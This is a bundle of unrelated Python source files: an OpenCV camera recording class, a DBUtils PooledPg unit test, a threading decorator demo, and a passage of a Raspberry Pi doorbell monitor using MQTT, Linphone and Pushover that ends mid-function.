'format': cv2.CAP_PROP_FORMAT,
'mode': cv2.CAP_PROP_MODE,
'brightness': cv2.CAP_PROP_BRIGHTNESS,
'contrast': cv2.CAP_PROP_CONTRAST,
'saturation': cv2.CAP_PROP_SATURATION,
'hue': cv2.CAP_PROP_HUE,
'gain': cv2.CAP_PROP_GAIN,
'exposure': cv2.CAP_PROP_EXPOSURE,
'convert_rgb': cv2.CAP_PROP_CONVERT_RGB,
'white_balance': cv2.CAP_PROP_WHITE_BALANCE_BLUE_U,
'rectification': cv2.CAP_PROP_RECTIFICATION,
'monochrome': cv2.CAP_PROP_MONOCHROME, #
'sharpness': cv2.CAP_PROP_SHARPNESS, #
'auto_exposure': cv2.CAP_PROP_AUTO_EXPOSURE,
'gamma': cv2.CAP_PROP_GAMMA, #
'temperatrue': cv2.CAP_PROP_TEMPERATURE, #
'trigger': cv2.CAP_PROP_TRIGGER, #
'trigger_delay': cv2.CAP_PROP_TRIGGER_DELAY, #
'white_balance_red_v': cv2.CAP_PROP_WHITE_BALANCE_RED_V, #
'zoom': cv2.CAP_PROP_ZOOM, #
'focus': cv2.CAP_PROP_FOCUS, #
'guid': cv2.CAP_PROP_GUID, #
'iso_speed': cv2.CAP_PROP_ISO_SPEED, #
'backlight': cv2.CAP_PROP_BACKLIGHT, #
'pan': cv2.CAP_PROP_PAN, #
'tilt': cv2.CAP_PROP_TILT, #
'roll': cv2.CAP_PROP_ROLL, #
'iris': cv2.CAP_PROP_IRIS, #
'settings': cv2.CAP_PROP_SETTINGS, #
'buffersize': cv2.CAP_PROP_BUFFERSIZE, #
'autofocus': cv2.CAP_PROP_AUTOFOCUS, #
'sar_num': cv2.CAP_PROP_SAR_NUM, #
'sar_den': cv2.CAP_PROP_SAR_DEN, #
'backend': cv2.CAP_PROP_BACKEND, #
'channel': cv2.CAP_PROP_CHANNEL, #
'auto_wb': cv2.CAP_PROP_AUTO_WB, #
'wb_temperatrue': cv2.CAP_PROP_WB_TEMPERATURE #
}
self._mark = {
'mark': True,
'text': ' ',
'x': 10,
'y': 60,
'fontScale': 1,
'R': 0,
'G': 255,
'B': 255,
'thick': 1
}
self._start_time = 0
self._check_time = 0
self.frameCnt = 0
self.fps = 25.0
self.capture = None
self.stopRecord = False
def start_camera(self, camera_id=0, **kwargs):
self._mark = {
'mark': True,
'text': ' ',
'x': 10,
'y': 60,
'fontScale': 1,
'R': 0,
'G': 255,
'B': 255,
'thick': 1
}
self.capture = cv2.VideoCapture(camera_id)
if not self.capture.isOpened():
self.capture.open(camera_id)
if kwargs:
available_params = list(self.FrameID.keys())
set_params = list(kwargs.keys())
for p in set_params:
if p not in available_params:
logger.info("un support camera param: {}={}".format(p, kwargs[p]))
continue
logger.info("setting camera param: {}={}".format(p, kwargs[p]))
self.set_property(p, kwargs[p])
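    # A minimal usage sketch (hypothetical device index and values; any key of
    # self.FrameID can be passed as a keyword and is forwarded to set_property):
    #     cam = BaseCamera()
    #     cam.start_camera(0, frame_width=640, frame_height=480, fps=30)
    #     cam.take_picture('frame.png')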
def set_mark(self, **kwargs):
if 'mark' in kwargs:
if str(kwargs['mark']).lower() == 'true':
self._mark['mark'] = True
else:
self._mark['mark'] = False
if 'text' in kwargs and len(str(kwargs['text'])) > 0:
self._mark['text'] = kwargs['text']
else:
if 'logMark' in kwargs:
self._mark['text'] = kwargs['logMark']
else:
self._mark['text'] = ' '
if 'x' in kwargs and 0 <= int(kwargs['x']) <= 640:
self._mark['x'] = int(kwargs['x'])
if 'y' in kwargs and 0 <= int(kwargs['y']) <= 480:
self._mark['y'] = int(kwargs['y'])
if 'fontScale' in kwargs and int(kwargs['fontScale']) > 0:
self._mark['fontScale'] = int(kwargs['fontScale'])
if 'R' in kwargs and 0 <= int(kwargs['R']) <= 255:
self._mark['R'] = int(kwargs['R'])
if 'G' in kwargs and 0 <= int(kwargs['G']) <= 255:
self._mark['G'] = int(kwargs['G'])
if 'B' in kwargs and 0 <= int(kwargs['B']) <= 255:
self._mark['B'] = int(kwargs['B'])
if 'thick' in kwargs and int(kwargs['thick']) > 0:
self._mark['thick'] = int(kwargs['thick'])
if 'logMark' in kwargs:
self._mark['mark'] = True
video_time = int(float(self.frameCnt) / self.fps)
if video_time < 0:
video_time = 0
            logger.info(
                "Case: <{}> start to run at time: <{}min - {}sec>".format(str(kwargs['logMark']), video_time // 60,
                                                                          video_time % 60))
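    # Example call (sketch with hypothetical values; every keyword is optional and
    # validated by the range checks above):
    #     cam.set_mark(mark='True', text='run-42', x=10, y=60, fontScale=1,
    #                  R=255, G=0, B=0, thick=2)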
def stop_record(self):
self.stopRecord = True
time.sleep(3)
self.stop_camera()
time.sleep(3)
def get_picture_from_record(self, path):
cv2.imwrite(path, self.frame)
return path
def take_picture(self, path):
self._take_frame(path)
return path
def _take_frame(self, name='test.png', gray=False):
try:
name = str(name)
ret, frame = self.capture.read()
if ret:
if gray:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imwrite(name, frame)
else:
logger.error("Camera read frame error.")
return -1
except Exception as e:
logger.error("_take_frame: {}".format(e))
def start_record(self, name='test', total_time=20, fps=20, width=640, height=480, code='MJPG', **kwargs):
try:
self.start_camera(**kwargs)
rec = threading.Thread(target=self.record_video, args=(name, total_time, fps, width, height, code))
rec.setDaemon(False)
rec.start()
except Exception as e:
logger.error("start_record: {}".format(e))
def record_video(self, path, total_time=100, fps=20, width=640, height=480, code='MJPG'):
index = 1
record_time = 20
while True:
datetime = self._utils.get_time_as_string()
tmp = path[:-4] + '_' + str(index) + '_' + datetime + '.avi'
self._record(tmp, fps, record_time, width=width, height=height, code=code)
if index > int(float(total_time) / record_time):
self.stop_camera()
break
index += 1
if self.stopRecord:
break
def _record(self, name='test.avi', fps=20, time_=20, width=640, height=480, code='MJPG'):
try:
name = str(name)
time_ = int(time_)
fps = float(fps)
if fps < 5 or fps > 30:
fps = self.fps
else:
self.fps = fps
code = str(code)
fourcc = cv2.VideoWriter_fourcc(*code)
if code.lower() == 'none':
fourcc = -1
out = cv2.VideoWriter(name, fourcc, fps, (width, height), True)
self._start_time = time.time()
logger.info("Start to record video: <{}> at time: {}".format(name, self._start_time))
self.frameCnt = 0
            while self.capture.isOpened():
                ret, self.frame = self.capture.read()
                if ret:
                    if self._mark['mark']:
                        # Stamp the configured overlay text (current timestamp) onto the frame
                        self._mark['text'] = self._utils.get_time_as_string()
                        cv2.putText(self.frame, self._mark['text'], (self._mark['x'], self._mark['y']),
                                    cv2.FONT_HERSHEY_SIMPLEX, self._mark['fontScale'],
                                    (self._mark['R'], self._mark['G'], self._mark['B']), self._mark['thick'],
                                    cv2.LINE_AA)
                    out.write(self.frame)
                    self.frameCnt += 1
                self._check_time = time.time()
                if int(self._check_time - self._start_time) >= (time_ * 60):
                    break
if self.stopRecord:
break
out.release()
logger.info("Stop record video: <{}> at time: {}, or {}sec, total frame: {}"
.format(name, self._check_time, int(self._check_time - self._start_time), self.frameCnt))
except Exception as e:
logger.error("_record : {}".format(e))
def camera_test(self, wait=2, **kwargs):
self.start_camera(**kwargs)
start_time = time.time()
while self.capture.isOpened():
ret, frame = self.capture.read()
if ret:
cv2.imshow('f', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
check_time = time.time()
if int(check_time - start_time) >= (wait * 60):
break
cv2.destroyAllWindows()
self.stop_camera()
def set_property(self, property_name, value):
property_name = str(property_name).lower()
if property_name in ('frame_width',
'frame_height',
'fps',
'brightness',
'hue',
'contrast',
'saturation',
'gain',
'exposure',
'white_balance'):
value = float(value)
if property_name in ('frame_width',
'frame_height',
'fps'):
value = int(value)
elif property_name in ('convert_rgb',):
if str(value).lower() == 'true':
value = True
else:
value = False
self.capture.set(self.FrameID[property_name], value)
def reset_property(self):
self.capture.set(self.FrameID['pos_msec'], -1.0)
self.capture.set(self.FrameID['pos_frames'], -1.0)
self.capture.set(self.FrameID['pos_avi_ratio'], -1.0)
self.capture.set(self.FrameID['frame_width'], 640)
self.capture.set(self.FrameID['frame_height'], 480)
self.capture.set(self.FrameID['fps'], 0)
self.capture.set(self.FrameID['fourcc'], -466162819.0)
self.capture.set(self.FrameID['frame_count'], -1.0)
self.capture.set(self.FrameID['format'], -1.0)
self.capture.set(self.FrameID['mode'], -1.0)
self.capture.set(self.FrameID['brightness'], 128.0)
self.capture.set(self.FrameID['contrast'], 32.0)
self.capture.set(self.FrameID['saturation'], 32.0)
self.capture.set(self.FrameID['hue'], 175230088.0)
self.capture.set(self.FrameID['gain'], 131.0)
self.capture.set(self.FrameID['exposure'], -5.0)
self.capture.set(self.FrameID['convert_rgb'], -1.0)
self.capture.set(self.FrameID['white_balance'], 6150.0)
self.capture.set(self.FrameID['rectification'], -1.0)
def get_property(self, property_name=''):
if property_name:
property_name = str(property_name).lower()
return self.capture.get(self.FrameID[property_name])
else:
all_settings = {}
for f in self.FrameID:
                all_settings[f] = self.capture.get(self.FrameID[f])
            return all_settings
|
test_pooled_pg.py
|
"""Test the PooledPg module.
Note:
We don't test performance here, so the test does not predicate
whether PooledPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
import unittest
from . import mock_pg # noqa
from dbutils.pooled_pg import PooledPg, InvalidConnection
class TestPooledPg(unittest.TestCase):
def test_version(self):
from dbutils import __version__, pooled_pg
self.assertEqual(pooled_pg.__version__, __version__)
self.assertEqual(PooledPg.version, __version__)
def test_create_connection(self):
pool = PooledPg(
1, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 1)
self.assertTrue(hasattr(pool, '_maxusage'))
self.assertIsNone(pool._maxusage)
self.assertTrue(hasattr(pool, '_setsession'))
self.assertIsNone(pool._setsession)
self.assertTrue(hasattr(pool, '_reset'))
self.assertFalse(pool._reset)
db_con = pool._cache.get(0)
pool._cache.put(db_con, 0)
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertTrue(hasattr(db, '_con'))
self.assertEqual(db._con, db_con)
self.assertTrue(hasattr(db, 'query'))
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
self.assertTrue(hasattr(db, '_maxusage'))
self.assertEqual(db._maxusage, 0)
self.assertTrue(hasattr(db, '_setsession_sql'))
self.assertIsNone(db._setsession_sql)
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
db.query('select test')
self.assertEqual(db.num_queries, 1)
pool = PooledPg(1)
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertIsNone(db.dbname)
self.assertTrue(hasattr(db, 'user'))
self.assertIsNone(db.user)
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
pool = PooledPg(0, 0, 0, False, 3, ('set datestyle',),)
self.assertEqual(pool._maxusage, 3)
self.assertEqual(pool._setsession, ('set datestyle',))
db = pool.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
def test_close_connection(self):
pool = PooledPg(
0, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
db = pool.connection()
self.assertTrue(hasattr(db, '_con'))
db_con = db._con
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(db.num_queries, 0)
db.query('select test')
self.assertEqual(db.num_queries, 1)
db.close()
self.assertRaises(InvalidConnection, getattr, db, 'num_queries')
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
self.assertEqual(db.num_queries, 1)
db.query('select test')
self.assertEqual(db.num_queries, 2)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 1)
self.assertEqual(pool._cache.get(0), db_con)
def test_min_max_cached(self):
pool = PooledPg(3)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 6)
pool = PooledPg(3, 4)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 4)
pool = PooledPg(3, 2)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(4)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(4):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
pool = PooledPg(2, 5)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 2)
cache = [pool.connection() for i in range(10)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(10):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 5)
def test_max_connections(self):
from dbutils.pooled_pg import TooManyConnections
pool = PooledPg(1, 2, 3)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(0, 1, 1, False)
self.assertEqual(pool._blocking, 0)
self.assertEqual(pool._cache.qsize(), 0)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
del db
del cache
pool = PooledPg(1, 2, 1)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection()]
self.assertEqual(pool._cache.qsize(), 0)
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(3, 2, 1, False)
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(len(cache), 3)
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(1, 1, 1, True)
self.assertEqual(pool._blocking, 1)
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
def connection():
pool.connection().query('set thread')
from threading import Thread
thread = Thread(target=connection)
thread.start()
thread.join(0.1)
self.assertTrue(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 0)
session = db._con.session
self.assertEqual(session, [])
del db
thread.join(0.1)
self.assertFalse(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(session, ['thread'])
del db
def test_one_thread_two_connections(self):
pool = PooledPg(2)
db1 = pool.connection()
for i in range(5):
db1.query('select test')
db2 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
for i in range(7):
db2.query('select test')
self.assertEqual(db1.num_queries, 5)
self.assertEqual(db2.num_queries, 7)
del db1
db1 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertTrue(hasattr(db1, 'query'))
for i in range(3):
db1.query('select test')
self.assertEqual(db1.num_queries, 8)
db2.query('select test')
self.assertEqual(db2.num_queries, 8)
def test_three_threads_two_connections(self):
pool = PooledPg(2, 2, 2, True)
try:
from queue import Queue, Empty
except ImportError: # Python 2
from Queue import Queue, Empty
queue = Queue(3)
def connection():
try:
queue.put(pool.connection(), 1, 1)
except TypeError:
queue.put(pool.connection(), 1)
from threading import Thread
for i in range(3):
Thread(target=connection).start()
try:
db1 = queue.get(1, 1)
db2 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
db2 = queue.get(1)
db1_con = db1._con
db2_con = db2._con
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1_con, db2_con)
try:
self.assertRaises(Empty, queue.get, 1, 0.1)
except TypeError:
self.assertRaises(Empty, queue.get, 0)
del db1
try:
db1 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertEqual(db1._con, db1_con)
def test_reset_transaction(self):
pool = PooledPg(1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, ['begin', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['rollback', 'begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(
con.session, ['rollback', 'begin', 'rollback', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=2)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, [])
self.assertEqual(con.num_queries, 0)
if __name__ == '__main__':
unittest.main()
|
main.py
|
import time
import functools
import threading
def run_async(func):
    # Decorator that runs the wrapped function in a background thread
    # ('async' itself cannot be used as a name: it is a reserved keyword in Python 3.7+).
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        my_thread = threading.Thread(target=func, args=args, kwargs=kwargs)
        my_thread.start()
    return wrapper
@run_async
def foo(x, y):
    c = 0
    while c < 5:
        c = c + 1
        print('\n', x, y)
        time.sleep(3)
        print('---')
foo(456, 789)
foo(123, y=345)
foo(333, y=2)
foo(444, y=1)
foo(990, y=3)
|
Northcliff_Doorbell_Monitor_Gen.py
|
#!/usr/bin/env python3
# Northcliff Doorbell Monitor Version 2.6 GEN
# Requires Home Manager >= V8.5
import RPi.GPIO as GPIO
import time
from datetime import datetime
import subprocess
import http.client
import urllib
import mmap
import requests
from threading import Thread
import paho.mqtt.client as mqtt
import struct
import json
import os
class TwoLedFlash(object): # The class for the LED flashing thread
def __init__(self, cycle_duration, cycle_count):
self.cycle_duration = cycle_duration
self.cycle_count = cycle_count
# Set up the LED GPIO ports
self.auto_led_off = 21
self.manual_led_off = 27
GPIO.setup(self.auto_led_off, GPIO.OUT)
GPIO.setup(self.manual_led_off, GPIO.OUT)
# Turn off both LEDs
GPIO.output(self.manual_led_off, True)
self.manual_led_state = False
GPIO.output(self.auto_led_off, True)
self.auto_led_state = False
self.manual_led_on_count = 10 # LED flashing during startup
self.auto_led_on_count = 10 # LED flashing during startup
self.flash_enable = True # Allows LED flashing to proceed upon startup
self.led_counter = 0 # Reset LED Counter upon startup
def terminate(self): # Stops the LED flashing loop upon shutdown
self.flash_enable = False
def run(self): # The LED flashing method
while self.flash_enable == True: # LED flashing loop continues until shut down
if self.led_counter < self.cycle_count: # led_cycle count sets the number of loops per cycle
if self.led_counter >= self.manual_led_on_count:
GPIO.output(self.manual_led_off, True)
self.manual_led_state = False
else:
GPIO.output(self.manual_led_off, False)
self.manual_led_state = True
if self.led_counter >= self.auto_led_on_count:
GPIO.output(self.auto_led_off, True)
self.auto_led_state = False
else:
GPIO.output(self.auto_led_off, False)
self.auto_led_state = True
self.led_counter += 1
time.sleep(self.cycle_duration) # cycle_duration sets the time increments for the flashing of the LED
else:
self.led_counter = 0
class NorthcliffDoorbellMonitor(object): # The class for the main door monitor program
def __init__(self, pushover_in_manual_mode, full_video, ask_for_auto_time_input, active_auto_start, active_auto_finish, disable_weekend,
manual_mode_call_sip_address, pushover_token, pushover_user, linphone_debug_log_file, auto_message_file,
auto_video_capture_directory, linphone_config_file, auto_on_startup, linphone_in_manual_mode, heartbeat_enabled):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# Set up the non-LED GPIO ports
self.manual_button = 17
self.auto_button = 22
self.door_bell_not_ringing = 24
self.open_door = 18
GPIO.setup(self.door_bell_not_ringing, GPIO.IN)
GPIO.setup(self.open_door, GPIO.OUT)
GPIO.setup(self.manual_button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(self.auto_button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(self.manual_button, GPIO.RISING, self.process_manual_button, bouncetime=300)
GPIO.add_event_detect(self.auto_button, GPIO.RISING, self.process_auto_button, bouncetime=300)
# Set up status flags
self.idle_mode_enabled = True
self.manual_mode_enabled = False
self.auto_mode_enabled = False
self.triggered = False
self.shutdown = False
self.ringing = False
# Set up pushover and linphone
self.manual_mode_call_sip_address = manual_mode_call_sip_address
self.pushover_token = pushover_token
self.pushover_user = pushover_user
self.linphone_debug_log_file = linphone_debug_log_file
self.auto_message_file = auto_message_file
self.auto_video_capture_directory = auto_video_capture_directory
self.linphone_config_file = linphone_config_file
self.ask_for_auto_time_input = ask_for_auto_time_input
self.pushover_in_manual_mode = pushover_in_manual_mode
self.auto_on_startup = auto_on_startup
self.linphone_in_manual_mode = linphone_in_manual_mode
self.heartbeat_enabled = heartbeat_enabled
if full_video == True:
self.linphone_video_parameter = "V"
print("Full Video Mode")
else:
self.linphone_video_parameter = "C" # Capture-only Video Mode
# Set up auto start and finish times
if self.ask_for_auto_time_input == False:
self.active_auto_start = active_auto_start
self.active_auto_finish = active_auto_finish
self.disable_weekend = disable_weekend
# Set up mqtt comms
self.client = mqtt.Client('doorbell') # Create new instance of mqtt Class
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.connect("<mqtt broker name>", 1883, 60) # Connect to mqtt broker
self.client.loop_start() # Start mqtt monitor thread
self.disable_doorbell_ring_sensor = False # Enable doorbell ring sensor
self.entry_door_open = False
self.heartbeat_count = 0
self.no_heartbeat_ack = False
self.linphone_active = False
def on_connect(self, client, userdata, flags, rc):
time.sleep(1)
self.print_status("Connected to mqtt server with result code "+str(rc)+" on ")
self.client.subscribe('DoorbellButton')
def on_message(self, client, userdata, msg): #Process mqtt messages
decoded_payload = str(msg.payload.decode('utf-8'))
parsed_json = json.loads(decoded_payload)
#print(parsed_json)
if str(msg.topic) == 'DoorbellButton':
if parsed_json['service'] == 'Automatic':
self.process_auto_button(self.auto_button)
elif parsed_json['service'] == 'Manual':
self.process_manual_button(self.manual_button)
elif parsed_json['service'] == 'Open Door':
self.open_and_close_door()
elif parsed_json['service'] == 'Update Status':
self.update_status()
elif parsed_json['service'] == 'Door Status Change':
self.process_door_status_change(parsed_json)
elif parsed_json['service'] == 'Heartbeat Ack':
self.heartbeat_ack()
else:
print('invalid button')
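    # Example 'DoorbellButton' payloads dispatched above (sketch, matching the
    # 'service' branches in on_message):
    #     {"service": "Automatic"}
    #     {"service": "Open Door"}
    #     {"service": "Door Status Change", "door": "Entry Door", "new_door_state": 1}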
def process_manual_button(self, channel):
self.print_status("Manual Button Pressed on ")
self.triggered = False
self.ringing = False
if self.manual_mode_enabled == False:
self.idle_mode_enabled = False
self.manual_mode_enabled = True
self.auto_mode_enabled = False
self.manual_mode_startup(normal_manual_flash = True)
else:
self.manual_mode_enabled = False
self.idle_mode_enabled = True
self.idle_mode_startup()
def process_auto_button(self, channel):
self.print_status("Auto Button Pressed on ")
self.triggered = False
self.ringing = False
if self.auto_mode_enabled == False:
self.idle_mode_enabled = False
self.auto_mode_enabled = True
self.manual_mode_enabled = False
self.auto_mode_attempt = True
else:
self.auto_mode_enabled = False
self.idle_mode_enabled = True
self.idle_mode_startup()
def process_door_status_change(self, parsed_json):
if parsed_json['door'] == 'Entry Door':
if parsed_json['new_door_state'] == 1: # If the door is now open
self.entry_door_open = True
self.print_status("Entry Door Opened. Automatic Answer Not Possible on ")
else: # If the door is now closed
self.entry_door_open = False
self.print_status("Entry Door Closed. Automatic Answer Now Possible if in hours on ")
self.update_status()
def heartbeat_ack(self):
#self.print_status('Heartbeat received from Home Manager on ')
self.heartbeat_count = 0
self.no_heartbeat_ack = False
def update_status(self): #Send status to Homebridge Manager
self.status = json.dumps({'service': 'Status Update', 'Idle': self.idle_mode_enabled, 'Automatic': self.auto_mode_enabled, 'Auto Possible': self.auto_possible(), 'Manual': self.manual_mode_enabled,
'Triggered': self.triggered, 'Terminated': self.shutdown, 'Ringing': self.ringing})
self.client.publish("DoorbellStatus", self.status)
def print_status(self, print_message):
today = datetime.now()
print(print_message + today.strftime('%A %d %B %Y @ %H:%M:%S'))
def input_auto_mode_times(self):
self.active_auto_start = int(input("Enter the 'Auto Answer Start Hour' in 24 hour format: "))
self.active_auto_finish = int(input("Enter the 'Auto Answer Finish Hour' in 24 hour format: "))
weekday_only = input("Disable Auto Mode on weekends? (y/n): ")
if weekday_only == "y":
self.disable_weekend = True
else:
self.disable_weekend = False
def idle_mode_startup(self):
self.flash_leds.manual_led_on_count = 1 # Short LED Flash
self.flash_leds.auto_led_on_count = 1 # Short LED Flash
self.flash_leds.led_counter = 0
self.idle_mode_enabled = True
if self.linphone_in_manual_mode == True and self.linphone_active == True:
self.stop_linphone()
self.print_status("Doorbell Monitor Idle on ")
self.update_status()
def auto_mode_startup(self):
self.flash_leds.manual_led_on_count = 0 # LED Off
if self.triggered == False:
self.flash_leds.auto_led_on_count = 20 # LED On
else:
self.flash_leds.auto_led_on_count = 10 # 50% LED Flash
self.flash_leds.led_counter = 0
self.print_status("Doorbell Monitor Auto Answer on ")
if self.linphone_in_manual_mode == True and self.linphone_active == True:
self.stop_linphone()
self.update_status()
def manual_mode_startup(self, normal_manual_flash):
if self.triggered == False:
self.flash_leds.manual_led_on_count = 20 # LED On to show that Manual Mode has been set up and has not been triggered
else:
self.flash_leds.manual_led_on_count = 10 # 50% LED Flash if the doorbell has been triggered
if normal_manual_flash == True: # Manual Mode has been invoked through setting manual mode (rather than because the hours are outside auto being possible)
self.flash_leds.auto_led_on_count = 0 # LED Off
else: # Manual Mode has been invoked in out of hours auto mode
self.flash_leds.auto_led_on_count = 1 # Short LED Flash to indicate that it's in manual mode because the time is outside auto being possible
self.flash_leds.led_counter = 0
self.print_status("Doorbell Monitor Manual Answer on ")
if self.linphone_in_manual_mode == True:
self.start_linphone()
self.update_status()
def idle_mode(self):
if GPIO.input(self.door_bell_not_ringing) == False and self.disable_doorbell_ring_sensor == False: #if the doorbell is rung and not disabled
self.print_status("Someone rang the bell on ")
self.ringing = True
print("Updating Ring Status True")
self.update_status()
self.ringing = False
time.sleep(2.5)
self.capture_video()
self.push_picture = True # Attach a picture
self.send_pushover_message(self.pushover_token, self.pushover_user, "Doorbell is ringing while in idle mode", "magic")
self.update_status()
def auto_mode(self):
if GPIO.input(self.door_bell_not_ringing) == False and self.disable_doorbell_ring_sensor == False: #if the doorbell is rung and not disabled
self.flash_leds.manual_led_on_count = 0 # LED Off
self.flash_leds.auto_led_on_count = 10 # 50% LED Flash
self.flash_leds.led_counter = 0
self.print_status("Someone rang the bell while in auto mode on ")
self.triggered = True
self.ringing = True
self.update_status()
self.ringing = False
time.sleep(2.5)
self.capture_video() # Capture picture before door opens
self.play_message()
self.push_picture = True # Tells Pushover to send a picture
self.open_and_close_door()
self.send_pushover_message(self.pushover_token, self.pushover_user, "Doorbell is ringing while in auto mode", "updown")
self.capture_video() # Capture picture after door opens
self.send_pushover_message(self.pushover_token, self.pushover_user, "Second Auto Mode picture capture", "magic")
self.update_status()
def manual_mode(self):
if GPIO.input(self.door_bell_not_ringing) == False and self.disable_doorbell_ring_sensor == False: #if the doorbell is rung and not disabled
self.flash_leds.manual_led_on_count = 10 # 50% LED Flash
self.flash_leds.led_counter = 0
self.print_status("Someone rang the bell while in manual mode on ")
self.triggered = True
self.ringing = True
self.update_status()
self.ringing = False
time.sleep(2.5)
self.capture_video()
if self.linphone_in_manual_mode == True:
print("Calling Linphone")
subprocess.call(['linphonecsh dial ' + self.manual_mode_call_sip_address], shell=True)
time.sleep(30)
print("Terminating Linphone call")
subprocess.call(["linphonecsh generic 'terminate'"], shell=True) # Terminate linphone call
if self.pushover_in_manual_mode == True:
print("Sending Pushover Message")
self.push_picture = True # Attach a picture
self.send_pushover_message(self.pushover_token, self.pushover_user, "Doorbell rang while in manual mode", "bugle")
self.update_status()
def play_message(self):
print("Playing message")
subprocess.call(['aplay -D front:CARD=Device,DEV=0 ' + self.auto_message_file], shell=True)
def send_pushover_message(self, token, user, pushed_message, alert_sound):
conn = http.client.HTTPSConnection("api.pushover.net:443")
if self.push_picture == False: # No picture is to be pushed
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": token,
"user": user,
"html": "1",
"title": "Doorbell",
"message": pushed_message,
"sound": alert_sound,
}), { "Content-type": "application/x-www-form-urlencoded" })
else: # Picture is to be pushed
r = requests.post("https://api.pushover.net/1/messages.json", data = {
"token": token,
"user": user,
"title": "Doorbell",
"message": pushed_message,
"sound": alert_sound
},
files = {
"attachment": ("image.jpg", open(self.picture_file_name, "rb"), "image/jpeg")
})
def open_and_close_door(self):
